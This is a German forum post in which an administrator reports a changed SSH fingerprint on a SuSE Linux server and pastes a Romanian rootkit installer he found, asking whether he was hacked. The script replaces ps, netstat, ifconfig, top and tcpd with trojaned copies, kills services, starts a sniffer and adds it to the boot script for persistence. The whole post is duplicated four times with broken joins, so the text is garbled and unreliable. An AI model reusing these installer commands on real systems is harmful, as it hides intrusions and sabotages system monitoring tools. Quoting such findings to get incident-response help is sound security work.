Buck76
30.12.01, 11:04
hallo zusammen,
heute morgen erwartete mich mein putty ssh mit einer überraschung: der "Finger print" unserer maschine (suse linux 6.4) war verändert und es erschien beim einloggen "no mail", was schon nach der qmail einführung auf der maschine nicht mehr läuft ;-(
jedenfalls hab ich dann auch noch ein verzeichnis rk mit einem seltsamen script entdeckt:
clear
echo
echo "Instalarea a inceput aveti rabdare...."
echo
echo
echo "Inlocuim netstat, ps, ifconfig, top... "
echo
echo
USERID=`id -u`
echo "--- Instalarea se face in ROOT mode?"
if [ $USERID -eq 0 ]
then
echo "+++ Da , putem continua"
else
echo "+++ Nope, instalarea se face in shell $USERID"
echo "Asta ii un ROOTKIT dobitocule si trebuie sa aiba uid=0"
exit
fi
chown root.root *
cp /usr/bin/crontab /usr/bin/ct
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
rm -rf /usr/sbin/tcpd
mv tcpd /usr/sbin/tcpd
killall -9 in.rexedcs
killall -9 defauths dcs
killall -9 defauths
killall -9 lpd
killall -9 rpc.statd
killall -9 portmap
killall -9 psybnc
usw.
echo -n "---Sniffer a fost pornit cu success---"
echo
echo "/usr/bin/sourcemask" >>/etc/rc.d/rc.sysinit
echo
echo
echo "Rootkit installed - made in Romania (str8hack) - (Catza)"
echo -n "-----------------------------------------------------------------------------------------
echo
echo
wurden wir gehackt? und was kann ich in der eile tun ?
gruss thomas hallo zusammen,
heute morgen erwartete mich mein putty ssh mit einer überraschung: der "Finger print" unserer maschine (suse linux 6.4) war verändert und es erschien beim einloggen "no mail", was schon nach der qmail einführung auf der maschine nicht mehr läuft ;-(
jedenfalls hab ich dann auch noch ein verzeichnis rk mit einem seltsamen script entdeckt:
clear
echo
echo "Instalarea a inceput aveti rabdare...."
echo
echo
echo "Inlocuim netstat, ps, ifconfig, top... "
echo
echo
USERID=`id -u`
echo "--- Instalarea se face in ROOT mode?"
if [ $USERID -eq 0 ]
then
echo "+++ Da , putem continua"
else
echo "+++ Nope, instalarea se face in shell $USERID"
echo "Asta ii un ROOTKIT dobitocule si trebuie sa aiba uid=0"
exit
fi
chown root.root *
cp /usr/bin/crontab /usr/bin/ct
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
rm -rf /usr/sbin/tcpd
mv tcpd /usr/sbin/tcpd
killall -9 in.rexedcs
killall -9 defauths dcs
killall -9 defauths
killall -9 lpd
killall -9 rpc.statd
killall -9 portmap
killall -9 psybnc
usw.
echo -n "---Sniffer a fost pornit cu success---"
echo
echo "/usr/bin/sourcemask" >>/etc/rc.d/rc.sysinit
echo
echo
echo "Rootkit installed - made in Romania (str8hack) - (Catza)"
echo -n "-----------------------------------------------------------------------------------------
echo
echo
wurden wir gehackt? und was kann ich in der eile tun ?
gruss thomas
heute morgen erwartete mich mein putty ssh mit einer überraschung: der "Finger print" unserer maschine (suse linux 6.4) war verändert und es erschien beim einloggen "no mail", was schon nach der qmail einführung auf der maschine nicht mehr läuft ;-(
jedenfalls hab ich dann auch noch ein verzeichnis rk mit einem seltsamen script entdeckt:
clear
echo
echo "Instalarea a inceput aveti rabdare...."
echo
echo
echo "Inlocuim netstat, ps, ifconfig, top... "
echo
echo
USERID=`id -u`
echo "--- Instalarea se face in ROOT mode?"
if [ $USERID -eq 0 ]
then
echo "+++ Da , putem continua"
else
echo "+++ Nope, instalarea se face in shell $USERID"
echo "Asta ii un ROOTKIT dobitocule si trebuie sa aiba uid=0"
exit
fi
chown root.root *
cp /usr/bin/crontab /usr/bin/ct
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
rm -rf /usr/sbin/tcpd
mv tcpd /usr/sbin/tcpd
killall -9 in.rexedcs
killall -9 defauths dcs
killall -9 defauths
killall -9 lpd
killall -9 rpc.statd
killall -9 portmap
killall -9 psybnc
usw.
echo -n "---Sniffer a fost pornit cu success---"
echo
echo "/usr/bin/sourcemask" >>/etc/rc.d/rc.sysinit
echo
echo
echo "Rootkit installed - made in Romania (str8hack) - (Catza)"
echo -n "-----------------------------------------------------------------------------------------
echo
echo
wurden wir gehackt? und was kann ich in der eile tun ?
gruss thomas hallo zusammen,
heute morgen erwartete mich mein putty ssh mit einer überraschung: der "Finger print" unserer maschine (suse linux 6.4) war verändert und es erschien beim einloggen "no mail", was schon nach der qmail einführung auf der maschine nicht mehr läuft ;-(
jedenfalls hab ich dann auch noch ein verzeichnis rk mit einem seltsamen script entdeckt:
clear
echo
echo "Instalarea a inceput aveti rabdare...."
echo
echo
echo "Inlocuim netstat, ps, ifconfig, top... "
echo
echo
USERID=`id -u`
echo "--- Instalarea se face in ROOT mode?"
if [ $USERID -eq 0 ]
then
echo "+++ Da , putem continua"
else
echo "+++ Nope, instalarea se face in shell $USERID"
echo "Asta ii un ROOTKIT dobitocule si trebuie sa aiba uid=0"
exit
fi
chown root.root *
cp /usr/bin/crontab /usr/bin/ct
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
rm -rf /usr/sbin/tcpd
mv tcpd /usr/sbin/tcpd
killall -9 in.rexedcs
killall -9 defauths dcs
killall -9 defauths
killall -9 lpd
killall -9 rpc.statd
killall -9 portmap
killall -9 psybnc
usw.
echo -n "---Sniffer a fost pornit cu success---"
echo
echo "/usr/bin/sourcemask" >>/etc/rc.d/rc.sysinit
echo
echo
echo "Rootkit installed - made in Romania (str8hack) - (Catza)"
echo -n "-----------------------------------------------------------------------------------------
echo
echo
wurden wir gehackt? und was kann ich in der eile tun ?
gruss thomas